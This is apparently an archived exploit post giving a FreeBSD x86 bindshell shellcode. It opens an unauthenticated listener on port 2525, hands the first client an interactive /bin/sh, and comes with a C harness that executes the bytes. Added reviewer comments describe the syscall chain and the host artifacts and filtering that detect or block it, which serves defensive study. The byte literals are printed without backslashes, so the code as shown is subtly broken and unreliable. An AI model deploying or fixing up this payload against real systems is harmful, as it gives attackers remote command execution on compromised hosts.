bds/x86 bindshell on port 2525 shellcode 167 bytes
Posted on 23 April 2010
/* -------------- bds/x86-bindshell on port 2525 167 bytes -------------------------
 *  AUTHOR : beosroot
 *  OS : BSDx86 (Tested on FreeBSD)
 *  EMAIL : beosroot@hotmail.fr beosroot@null.net
 *  GR33TZ To : joseph-h, str0ke, MHIDO55,.....
 */

/*
 * Reviewer summary, derived from the per-line assembly comments below.
 *
 * Calling convention seen throughout: FreeBSD/i386 `int $0x80` with the
 * arguments pushed right-to-left, one extra stack slot pushed before the
 * trap (the `push %eax` that precedes every syscall number) and the
 * syscall number loaded into %eax via push/pop.
 *
 * Syscall sequence:
 *   0x61  socket(AF_INET, SOCK_STREAM, 0)
 *   0x68  bind(s, {len 0x10, AF_INET, port 0x09dd = 2525, addr 0.0.0.0}, 0x10)
 *   0x6a  listen(s, 1)
 *   0x1e  accept(s, &peer, &peerlen)
 *   0x06  close(s)              -- listener is closed after the first peer
 *   0x5a  dup2(conn, 0), dup2(conn, 1), dup2(conn, 2)
 *   0x3b  execve("/bin/sh", {"sh", "-i", NULL}, NULL)
 *
 * What a defender can take from this:
 *   - The listener binds to all interfaces and performs no authentication;
 *     whoever connects first gets an interactive shell running with the
 *     privileges of the process that executed these bytes.
 *   - Host artifacts: a TCP listener on port 2525 owned by a process that
 *     does not normally listen (visible in `sockstat -l` / `netstat -an`
 *     until the first connection is accepted), followed by that process
 *     image becoming /bin/sh with argv "sh -i" and descriptors 0-2 all
 *     referring to one established TCP socket with local port 2525.
 *   - Default-deny inbound filtering blocks the connection even if the
 *     listener is created; exec auditing of /bin/sh from network services
 *     catches the final step.
 *
 * NOTE(review): the literals as shown on this page are plain text; the
 * opcode meaning used in this summary is taken from the per-line comments.
 */
const char shellcode[] =
    /* socket(AF_INET = 2, SOCK_STREAM = 1, 0); FreeBSD syscall 0x61 */
    "x6ax00"                // push $0x0
    "x6ax01"                // push $0x1
    "x6ax02"                // push $0x2
    "x50"                   // push %eax
    "x6ax61"                // push $0x61
    "x58"                   // pop %eax
    "xcdx80"                // int $0x80

    /* keep the socket descriptor on the stack, then build a zeroed
     * sockaddr_in whose first word is 10 02 09 dd in memory:
     * sin_len 0x10, sin_family AF_INET, sin_port 0x09dd (2525);
     * the address word that follows is zero, i.e. every local interface */
    "x50"                   // push %eax
    "x6ax00"                // push $0x0
    "x6ax00"                // push $0x0
    "x6ax00"                // push $0x0
    "x6ax00"                // push $0x0
    "x68x10x02x09xdd"       // push $0xdd090210
    "x89xe0"                // mov %esp,%eax

    /* bind(s, &sockaddr, 0x10); syscall 0x68 */
    "x6ax10"                // push $0x10
    "x50"                   // push %eax
    "xffx74x24x1c"          // pushl 0x1c(%esp)   -- saved socket descriptor
    "x50"                   // push %eax
    "x6ax68"                // push $0x68
    "x58"                   // pop %eax
    "xcdx80"                // int $0x80

    /* listen(s, 1); syscall 0x6a */
    "x6ax01"                // push $0x1
    "xffx74x24x28"          // pushl 0x28(%esp)   -- saved socket descriptor
    "x50"                   // push %eax
    "x6ax6a"                // push $0x6a
    "x58"                   // pop %eax
    "xcdx80"                // int $0x80

    /* accept(s, &peer, &peerlen); syscall 0x1e
     * 16 bytes of stack are reserved for the peer address and the pushed
     * 0x10 serves as the length variable */
    "x83xecx10"             // sub $0x10,%esp
    "x6ax10"                // push $0x10
    "x8dx44x24x04"          // lea 0x4(%esp),%eax
    "x89xe1"                // mov %esp,%ecx
    "x51"                   // push %ecx
    "x50"                   // push %eax
    "xffx74x24x4c"          // pushl 0x4c(%esp)   -- saved socket descriptor
    "x50"                   // push %eax
    "x6ax1e"                // push $0x1e
    "x58"                   // pop %eax
    "xcdx80"                // int $0x80

    /* save the accepted descriptor, then close(s) on the listener;
     * syscall 0x06 -- only one connection is ever served */
    "x50"                   // push %eax
    "xffx74x24x58"          // pushl 0x58(%esp)   -- saved socket descriptor
    "x50"                   // push %eax
    "x6ax06"                // push $0x6
    "x58"                   // pop %eax
    "xcdx80"                // int $0x80

    /* dup2(conn, 0); syscall 0x5a -- stdin now reads from the connection */
    "x6ax00"                // push $0x0
    "xffx74x24x0c"          // pushl 0xc(%esp)    -- accepted descriptor
    "x50"                   // push %eax
    "x6ax5a"                // push $0x5a
    "x58"                   // pop %eax
    "xcdx80"                // int $0x80

    /* dup2(conn, 1) -- stdout */
    "x6ax01"                // push $0x1
    "xffx74x24x18"          // pushl 0x18(%esp)   -- accepted descriptor
    "x50"                   // push %eax
    "x6ax5a"                // push $0x5a
    "x58"                   // pop %eax
    "xcdx80"                // int $0x80

    /* dup2(conn, 2) -- stderr */
    "x6ax02"                // push $0x2
    "xffx74x24x24"          // pushl 0x24(%esp)   -- accepted descriptor
    "x50"                   // push %eax
    "x6ax5a"                // push $0x5a
    "x58"                   // pop %eax
    "xcdx80"                // int $0x80

    /* argv = { "sh", "-i", NULL } built on the stack */
    "x68x73x68x00x00"       // push $0x6873       -- "sh"
    "x89xe0"                // mov %esp,%eax
    "x68x2dx69x00x00"       // push $0x692d       -- "-i"
    "x89xe1"                // mov %esp,%ecx
    "x6ax00"                // push $0x0
    "x51"                   // push %ecx
    "x50"                   // push %eax

    /* path = "/bin/sh", then execve(path, argv, NULL); syscall 0x3b */
    "x68x2fx73x68x00"       // push $0x68732f     -- "/sh"
    "x68x2fx62x69x6e"       // push $0x6e69622f   -- "/bin"
    "x89xe0"                // mov %esp,%eax
    "x8dx4cx24x08"          // lea 0x8(%esp),%ecx
    "x6ax00"                // push $0x0
    "x51"                   // push %ecx
    "x50"                   // push %eax
    "x50"                   // push %eax
    "x6ax3b"                // push $0x3b
    "x58"                   // pop %eax
    "xcdx80";               // int $0x80

/*
 * Test harness: casts the address of the array to a function pointer and
 * calls it, returning whatever the call yields.
 *
 * `hell` is assigned but never read; the call on the next line casts
 * `shellcode` a second time instead of using it.
 *
 * NOTE(review): `shellcode` is a const object, so it is normally placed in
 * read-only data; on builds where data pages are not executable the call
 * is expected to fault rather than run the bytes -- confirm for the
 * platform under analysis.
 */
int main()
{
    void (*hell)() = (void *)shellcode;
    return (*(int(*)())shellcode)();
}
// the end o.O